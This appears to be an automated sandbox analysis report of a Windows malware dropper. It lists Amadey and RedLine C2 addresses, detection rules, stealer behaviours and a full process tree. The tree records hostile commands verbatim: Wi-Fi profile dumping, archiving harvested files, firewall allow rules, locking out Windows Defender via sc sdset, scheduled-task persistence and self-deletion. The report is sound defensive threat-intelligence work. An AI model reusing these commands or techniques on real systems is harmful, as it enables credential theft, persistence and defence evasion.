Analysis
max time kernel: 104s
max time network: 151s
platform: windows11-21h2_x64
resource: win11-20240221-en
resource tags: arch:x64, arch:x86, image:win11-20240221-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 31-03-2024 13:56
Static task: static1
Behavioral task: behavioral1
  Sample: 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe
  Resource: win10v2004-20231215-en
Behavioral task: behavioral2
  Sample: 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe
  Resource: win11-20240221-en
General
Target: 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe
Size: 1.8MB
MD5: 84f8a62131b758731dac05c1b6ea9354
SHA1: 9f4c86697c014d0188f21e27f631692a7c6416f8
SHA256: 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7
SHA512: 074b47804c317445e206471d743791714a3bf83ea4f78181f57f0f3643f341bc912e67a78609feaa93fc7a2b46adbec2db1c0cceae323048f0f501fbad35fd89
SSDEEP: 24576:0HlG42OZ96DtCN2H5yVEhA6ZGw2AvLVImyJGjuXoCWpIGYdaxamraqY8wJPxbiR/:0HleOZ0BbwMjvg2KflzXd92nAYm
Malware Config
Extracted: amadey (version 4.17)
  http://185.215.113.32
  install_dir: 00c07260dc
  install_file: explorgu.exe
  strings_key: 461809bd97c251ba0c0c8450c7055f1d
  url_paths: /yandex/index.php
Extracted: redline (@OLEH_PSP)
  185.172.128.33:8970
Extracted: amadey (version 4.18)
  http://193.233.132.56
  install_dir: 09fd851a4f
  install_file: explorha.exe
  strings_key: 443351145ece4966ded809641c77cfa8
  url_paths: /Pneh2sXQk0/index.php
Extracted: redline (LiveTraffic)
  4.185.137.132:1632
Signatures
Detect ZGRat V1 4 IoCs
resource | yara_rule
behavioral2/files/0x0002000000025c82-54.dat | family_zgrat_v1
behavioral2/memory/2124-70-0x00000000003C0000-0x000000000057C000-memory.dmp | family_zgrat_v1
behavioral2/files/0x0002000000025caf-234.dat | family_zgrat_v1
behavioral2/files/0x0002000000025cb3-257.dat | family_zgrat_v1
Glupteba payload 8 IoCs
resource | yara_rule
behavioral2/memory/1908-866-0x0000000000400000-0x0000000003130000-memory.dmp | family_glupteba
behavioral2/memory/3348-899-0x0000000000400000-0x0000000003130000-memory.dmp | family_glupteba
behavioral2/memory/1504-906-0x0000000000400000-0x0000000003130000-memory.dmp | family_glupteba
behavioral2/memory/3348-980-0x0000000000400000-0x0000000003130000-memory.dmp | family_glupteba
behavioral2/memory/1504-987-0x0000000000400000-0x0000000003130000-memory.dmp | family_glupteba
behavioral2/memory/5764-1185-0x0000000000400000-0x0000000003130000-memory.dmp | family_glupteba
behavioral2/memory/5796-1186-0x0000000000400000-0x0000000003130000-memory.dmp | family_glupteba
behavioral2/memory/5956-1189-0x0000000000400000-0x0000000003130000-memory.dmp | family_glupteba
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload 7 IoCs
resource | yara_rule
behavioral2/files/0x0002000000025c8c-96.dat | family_redline
behavioral2/files/0x0002000000025c89-102.dat | family_redline
behavioral2/memory/3556-107-0x0000000000B10000-0x0000000000B62000-memory.dmp | family_redline
behavioral2/memory/2220-113-0x00000000009D0000-0x0000000000A5C000-memory.dmp | family_redline
behavioral2/files/0x0002000000025ca6-175.dat | family_redline
behavioral2/files/0x0002000000025caf-234.dat | family_redline
behavioral2/memory/3792-280-0x0000000000400000-0x0000000000450000-memory.dmp | family_redline
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explorgu.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | random.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | amadka.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explorha.exe
Blocklisted process makes network request 2 IoCs
flow | pid | Process
55 | 4152 | rundll32.exe
67 | 5520 | rundll32.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 3 IoCs
pid | Process
2884 | netsh.exe
5552 | netsh.exe
1600 | netsh.exe
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | amadka.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explorha.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explorgu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | random.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | random.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explorgu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | amadka.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explorha.exe
Executes dropped EXE 27 IoCs
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Wine | 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe
Key opened | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Wine | explorgu.exe
Key opened | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Wine | random.exe
Key opened | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Wine | amadka.exe
Key opened | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Wine | explorha.exe
Loads dropped DLL 10 IoCs
pid | Process
1744 | rundll32.exe
4152 | rundll32.exe
1708 | GDouWbq38shiSdxpGPfHUTkD.exe
2160 | GDouWbq38shiSdxpGPfHUTkD.exe
4208 | GDouWbq38shiSdxpGPfHUTkD.exe
4224 | GDouWbq38shiSdxpGPfHUTkD.exe
5112 | GDouWbq38shiSdxpGPfHUTkD.exe
5520 | rundll32.exe
1688 | u1vk.0.exe
1688 | u1vk.0.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 2 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\random.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000873001\\random.exe" | explorgu.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\amadka.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1001031001\\amadka.exe" | explorgu.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\F: | GDouWbq38shiSdxpGPfHUTkD.exe
File opened (read-only) | \??\D: | GDouWbq38shiSdxpGPfHUTkD.exe
File opened (read-only) | \??\F: | GDouWbq38shiSdxpGPfHUTkD.exe
File opened (read-only) | \??\D: | GDouWbq38shiSdxpGPfHUTkD.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow | ioc
1 | pastebin.com
18 | pastebin.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
73 | ipinfo.io
23 | ipinfo.io
38 | api.myip.com
71 | api.myip.com
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid | Process
1740 | 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe
2996 | explorgu.exe
1748 | amadka.exe
4936 | explorha.exe
Suspicious use of SetThreadContext 4 IoCs
description | pid | Process | procid_target
PID 2124 set thread context of 2064 | 2124 | alex1234.exe | 83
PID 1600 set thread context of 3792 | 1600 | goldprimeldlldf.exe | 96
PID 572 set thread context of 3088 | 572 | swiiiii.exe | 106
PID 1816 set thread context of 1528 | 1816 | Uni400uni.exe | 110
Drops file in Windows directory 2 IoCs
description | ioc | Process
File created | C:\Windows\Tasks\explorha.job | amadka.exe
File created | C:\Windows\Tasks\explorgu.job | 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe
Launches sc.exe 1 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
5160 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 3 IoCs
pid | pid_target | Process | procid_target
5028 | 572 | WerFault.exe | 101
4908 | 2432 | WerFault.exe | 114
1804 | 1688 | WerFault.exe | 121
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | u1vk.1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | u1vk.1.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | u1vk.1.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | u1vk.0.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | u1vk.0.exe
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
5148 | schtasks.exe
4908 | schtasks.exe
5552 | schtasks.exe
Modifies data under HKEY_USERS 64 IoCs
Modifies system certificate store
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | propro.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = (certificate blob omitted) | propro.exe
Runs ping.exe 1 TTPs 1 IoCs
pid | Process
6024 | PING.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 30 IoCs
Suspicious use of FindShellTrayWindow 8 IoCs
pid | Process
1748 | amadka.exe
3196 | u1vk.1.exe
3196 | u1vk.1.exe
3196 | u1vk.1.exe
3196 | u1vk.1.exe
3196 | u1vk.1.exe
3196 | u1vk.1.exe
3196 | u1vk.1.exe
Suspicious use of SendNotifyMessage 7 IoCs
pid | Process
3196 | u1vk.1.exe
3196 | u1vk.1.exe
3196 | u1vk.1.exe
3196 | u1vk.1.exe
3196 | u1vk.1.exe
3196 | u1vk.1.exe
3196 | u1vk.1.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe"C:\Users\Admin\AppData\Local\Temp\9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1740
-
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exeC:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
PID:3528
  C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2124
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      PID:3976
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID:2064
      C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
        cmd: "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
        - Executes dropped EXE
        - Modifies system certificate store
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID:3556
      C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
        cmd: "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID:2220
      C:\Windows\SysWOW64\cmd.exe
        cmd: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        PID:3880
        C:\Windows\SysWOW64\choice.exe
          cmd: choice /C Y /N /D Y /T 3
          PID:1508
  C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:1748
    C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious behavior: EnumeratesProcesses
      PID:4936
      C:\Windows\SysWOW64\rundll32.exe
        cmd: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        - Loads dropped DLL
        PID:1744
        C:\Windows\system32\rundll32.exe
          cmd: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
          - Blocklisted process makes network request
          - Loads dropped DLL
          - Suspicious behavior: EnumeratesProcesses
          PID:4152
          C:\Windows\system32\netsh.exe
            cmd: netsh wlan show profiles
            PID:804
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\594324687199_Desktop.zip' -CompressionLevel Optimal
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID:4232
      C:\Windows\SysWOW64\rundll32.exe
        cmd: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
        - Blocklisted process makes network request
        - Loads dropped DLL
        PID:5520
  C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2920
  C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2420
  C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:1600
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:3792
  C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2632
    C:\Windows\SysWOW64\schtasks.exe
      cmd: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe" /F
      - Creates scheduled task(s)
      PID:4908
    C:\Users\Admin\AppData\Local\Temp\1000183001\Uni400uni.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\1000183001\Uni400uni.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of AdjustPrivilegeToken
      PID:1816
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
        cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
        PID:236
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        - Suspicious use of AdjustPrivilegeToken
        PID:1528
        C:\Users\Admin\Pictures\p6u0u9NsFSyRSr6UUKCgAYxB.exe
          cmd: "C:\Users\Admin\Pictures\p6u0u9NsFSyRSr6UUKCgAYxB.exe"
          - Executes dropped EXE
          PID:2432
          C:\Users\Admin\AppData\Local\Temp\u1vk.0.exe
            cmd: "C:\Users\Admin\AppData\Local\Temp\u1vk.0.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - Checks processor information in registry
            - Suspicious behavior: EnumeratesProcesses
            PID:1688
            C:\Windows\SysWOW64\cmd.exe
              cmd: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\EBAFBGIDHC.exe"
              PID:5076
              C:\Users\Admin\AppData\Local\Temp\EBAFBGIDHC.exe
                cmd: "C:\Users\Admin\AppData\Local\Temp\EBAFBGIDHC.exe"
                PID:4640
                C:\Windows\SysWOW64\cmd.exe
                  cmd: "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\EBAFBGIDHC.exe
                  PID:564
                  C:\Windows\SysWOW64\PING.EXE
                    cmd: ping 2.2.2.2 -n 1 -w 3000
                    - Runs ping.exe
                    PID:6024
            C:\Windows\SysWOW64\WerFault.exe
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 3428
              - Program crash
              PID:1804
          C:\Users\Admin\AppData\Local\Temp\u1vk.1.exe
            cmd: "C:\Users\Admin\AppData\Local\Temp\u1vk.1.exe"
            - Executes dropped EXE
            - Checks SCSI registry key(s)
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SendNotifyMessage
            PID:3196
            C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
              cmd: "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
              PID:4792
          C:\Windows\SysWOW64\WerFault.exe
            cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 1512
            - Program crash
            PID:4908
        C:\Users\Admin\Pictures\RS7VMIrsQWdNPWVAW9XF7KXz.exe
          cmd: "C:\Users\Admin\Pictures\RS7VMIrsQWdNPWVAW9XF7KXz.exe"
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID:1908
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -nologo -noprofile
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID:3144
          C:\Users\Admin\Pictures\RS7VMIrsQWdNPWVAW9XF7KXz.exe
            cmd: "C:\Users\Admin\Pictures\RS7VMIrsQWdNPWVAW9XF7KXz.exe"
            - Executes dropped EXE
            - Modifies data under HKEY_USERS
            PID:5796
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              - Modifies data under HKEY_USERS
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              PID:6048
            C:\Windows\system32\cmd.exe
              cmd: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              PID:5304
              C:\Windows\System32\Conhost.exe
                cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                PID:4232
              C:\Windows\system32\netsh.exe
                cmd: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                - Modifies Windows Firewall
                PID:2884
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              PID:5584
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              PID:6064
        C:\Users\Admin\Pictures\zJKj9XrRYEzM0tjHDXgtwLkI.exe
          cmd: "C:\Users\Admin\Pictures\zJKj9XrRYEzM0tjHDXgtwLkI.exe"
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID:3348
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -nologo -noprofile
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID:420
          C:\Users\Admin\Pictures\zJKj9XrRYEzM0tjHDXgtwLkI.exe
            cmd: "C:\Users\Admin\Pictures\zJKj9XrRYEzM0tjHDXgtwLkI.exe"
            - Executes dropped EXE
            PID:5764
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              - Modifies data under HKEY_USERS
              - Suspicious use of AdjustPrivilegeToken
              PID:6020
            C:\Windows\system32\cmd.exe
              cmd: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              PID:5284
              C:\Windows\system32\netsh.exe
                cmd: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                - Modifies Windows Firewall
                PID:5552
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              PID:5244
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              PID:2812
            C:\Windows\rss\csrss.exe
              cmd: C:\Windows\rss\csrss.exe
              PID:1928
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmd: powershell -nologo -noprofile
                PID:5808
              C:\Windows\SYSTEM32\schtasks.exe
                cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                - Creates scheduled task(s)
                PID:5552
              C:\Windows\SYSTEM32\schtasks.exe
                cmd: schtasks /delete /tn ScheduledUpdate /f
                PID:1424
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmd: powershell -nologo -noprofile
                PID:5388
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmd: powershell -nologo -noprofile
                PID:6080
              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                cmd: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                PID:5032
              C:\Windows\SYSTEM32\schtasks.exe
                cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                - Creates scheduled task(s)
                PID:5148
              C:\Windows\windefender.exe
                cmd: "C:\Windows\windefender.exe"
                PID:5808
                C:\Windows\SysWOW64\cmd.exe
                  cmd: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                  PID:1468
                  C:\Windows\SysWOW64\sc.exe
                    cmd: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                    - Launches sc.exe
                    PID:5160
        C:\Users\Admin\Pictures\P9SgmBKE6sh3sHzqGHlgHRIR.exe
          cmd: "C:\Users\Admin\Pictures\P9SgmBKE6sh3sHzqGHlgHRIR.exe"
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID:1504
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -nologo -noprofile
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID:4544
          C:\Users\Admin\Pictures\P9SgmBKE6sh3sHzqGHlgHRIR.exe
            cmd: "C:\Users\Admin\Pictures\P9SgmBKE6sh3sHzqGHlgHRIR.exe"
            - Executes dropped EXE
            PID:5956
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              PID:4988
            C:\Windows\system32\cmd.exe
              cmd: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              PID:5444
              C:\Windows\system32\netsh.exe
                cmd: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                - Modifies Windows Firewall
                PID:1600
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              PID:5880
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              PID:6056
        C:\Users\Admin\Pictures\GDouWbq38shiSdxpGPfHUTkD.exe
          cmd: "C:\Users\Admin\Pictures\GDouWbq38shiSdxpGPfHUTkD.exe" --silent --allusers=0
          - Executes dropped EXE
          - Loads dropped DLL
          - Enumerates connected drives
          PID:1708
          C:\Users\Admin\Pictures\GDouWbq38shiSdxpGPfHUTkD.exe
            cmd: C:\Users\Admin\Pictures\GDouWbq38shiSdxpGPfHUTkD.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6b83e1d0,0x6b83e1dc,0x6b83e1e8
            - Executes dropped EXE
            - Loads dropped DLL
